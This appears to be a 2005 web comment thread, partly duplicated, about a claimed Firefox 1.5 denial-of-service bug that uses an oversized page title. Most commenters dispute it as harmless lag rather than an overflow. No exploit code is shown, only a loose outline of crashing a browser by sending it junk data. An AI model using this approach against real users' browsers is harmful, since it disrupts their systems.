packetstormsecurity.org— A simple DoS exploit for Firefox 1.5 was released today.. All you have to do is create a simple webpage with the following code.. Simply evil.
Dec 7, 2005View in Crawl 4
hevnsnt Just a few things and for everyone else worried about this.1. java script has NOTHING to do with this "vulnerability" and yes I use that term loosely, if it was possible to execute arbitrary code via this method it could be done in a plain HTML file without any scripting just by building a payload and pasting it into the HTML with the title tags wrapped around it. 2. There is NO buffer overflow, nothing on the stack gets overwritten when visiting the site with large amounts of data in the title nor does the stack of the firefox instance get overwritten when you close and open the browser again this is FALSE hevnsnt you should've never posted this without being sure I am also sad to see it already made it to packetstormsecurity which just shows how desperate people are to find new flaws.When I first read this article I went to firefox site and checked to see if the vulnerability was on their site yet, but it wasn't which kind of made me wonder if it wasn't some kind of hoax, then it tested the vulnerability myself using two sets of code one a normal HTML file i called firefux.html and a perl cgi i called firefux.cgi I uploaded these files to a co-located machine I have and I hit them both from Firefox 1.5 (Windows XP SP1) and from Firefox 1.5 (Gentoo 2005.1) Okay and guess what the results were....Well in Windows I was surprised that even when hitting my code the browser rarely even lagged CPU wasn't consumed all that much and it did not crash or freeze up at all!!! even when i restarted the browser..windows actually took it like a champ :-/now when i hit the same code on my laptop running gentoo(linux for you nubs) firefox lagged badly and even froze when i enlarged my buffers to around 1000000 bytes, the firefox process actually became a zombie :-/ so my linux box didnt take it all that well, BUT!!! there was no OVERFLOW on the stack!!! this is a false there is no way to gain escalated privileges through this method on a remote machine IT IS NOT POSSIBLE!!!!!! It isn't even a very good DoS it's really sad and not even worth mention but it was so now it comes to this :-) I think it should be taken off of packetstormsecurity and other places, hevnsnt you should also apologize to all the users of diggs, firefox developers, and the entire IT security community for being so silly!! Just one more time for you folks:THIS IS FALSE INFORMATION POSTED BY hevnsnt!FIREFOX IS NOT VULNERABLE USING THE METHOD PROVIDED BY HIM!!!!
Okay I forgot a little, the reason my windows box took it better then my laptop with linux is because my desktop running windows has more memory and more cpu power about 50% more of both than my linux machine, also for people asking if this crashes IE too NO it wouldn't and if it does its not because IE handles history and history.dat(if IE even uses a history.dat) the same way firefox does, also people trying to compare IE to firefox, well all I have to say is FIREFOX IS AWESOME and IE is junk period.Also anyone who thinks this should still be worth mentioning because even though it can not execute arbitrary code on the firefox user's machine but it can freeze,lag, or possiably crash a firefox instance...well so what?!? I mean you could do this to ANY broswer in a number of ways as long as you send enough JUNK to the users broswer, this could be in the title or in the body of the website or even a REALLY big image....This is useless worthless information that actually did looking promising from the post, but it isn't this is NO threat to firefox users at least no more then to other broswers.
It didn't crash my Firefox 1.5. It didn't even slow down the startup time for Firefox either. Of course, I already set privacy to auto-remove my history everytime it shut down.The whole point is the results VARY depend on hardwares, OS, and what configs your FF is set on.
cryptocomDec 7, 2005
Just set the number of days for Firefox to keep your browsing history to zero.Tools/Options/History...
cubsman44Dec 8, 2005
Dosent work and why would you want to crash firefox
tokenDec 8, 2005
hevnsnt Just a few things and for everyone else worried about this.1. java script has NOTHING to do with this "vulnerability" and yes I use that term loosely, if it was possible to execute arbitrary code via this method it could be done in a plain HTML file without any scripting just by building a payload and pasting it into the HTML with the title tags wrapped around it. 2. There is NO buffer overflow, nothing on the stack gets overwritten when visiting the site with large amounts of data in the title nor does the stack of the firefox instance get overwritten when you close and open the browser again this is FALSE hevnsnt you should've never posted this without being sure I am also sad to see it already made it to packetstormsecurity which just shows how desperate people are to find new flaws.When I first read this article I went to firefox site and checked to see if the vulnerability was on their site yet, but it wasn't which kind of made me wonder if it wasn't some kind of hoax, then it tested the vulnerability myself using two sets of code one a normal HTML file i called firefux.html and a perl cgi i called firefux.cgi I uploaded these files to a co-located machine I have and I hit them both from Firefox 1.5 (Windows XP SP1) and from Firefox 1.5 (Gentoo 2005.1) Okay and guess what the results were....Well in Windows I was surprised that even when hitting my code the browser rarely even lagged CPU wasn't consumed all that much and it did not crash or freeze up at all!!! even when i restarted the browser..windows actually took it like a champ :-/now when i hit the same code on my laptop running gentoo(linux for you nubs) firefox lagged badly and even froze when i enlarged my buffers to around 1000000 bytes, the firefox process actually became a zombie :-/ so my linux box didnt take it all that well, BUT!!! there was no OVERFLOW on the stack!!! this is a false there is no way to gain escalated privileges through this method on a remote machine IT IS NOT POSSIBLE!!!!!! It isn't even a very good DoS it's really sad and not even worth mention but it was so now it comes to this :-) I think it should be taken off of packetstormsecurity and other places, hevnsnt you should also apologize to all the users of diggs, firefox developers, and the entire IT security community for being so silly!! Just one more time for you folks:THIS IS FALSE INFORMATION POSTED BY hevnsnt!FIREFOX IS NOT VULNERABLE USING THE METHOD PROVIDED BY HIM!!!!
tokenDec 8, 2005
Okay I forgot a little, the reason my windows box took it better then my laptop with linux is because my desktop running windows has more memory and more cpu power about 50% more of both than my linux machine, also for people asking if this crashes IE too NO it wouldn't and if it does its not because IE handles history and history.dat(if IE even uses a history.dat) the same way firefox does, also people trying to compare IE to firefox, well all I have to say is FIREFOX IS AWESOME and IE is junk period.Also anyone who thinks this should still be worth mentioning because even though it can not execute arbitrary code on the firefox user's machine but it can freeze,lag, or possiably crash a firefox instance...well so what?!? I mean you could do this to ANY broswer in a number of ways as long as you send enough JUNK to the users broswer, this could be in the title or in the body of the website or even a REALLY big image....This is useless worthless information that actually did looking promising from the post, but it isn't this is NO threat to firefox users at least no more then to other broswers.
gamingfoxDec 8, 2005
It didn't crash my Firefox 1.5. It didn't even slow down the startup time for Firefox either. Of course, I already set privacy to auto-remove my history everytime it shut down.The whole point is the results VARY depend on hardwares, OS, and what configs your FF is set on.
underlokDec 8, 2005
The results do not vary. It is a bug, period.
barbobotDec 10, 2005
input type crashbuh bye explorer.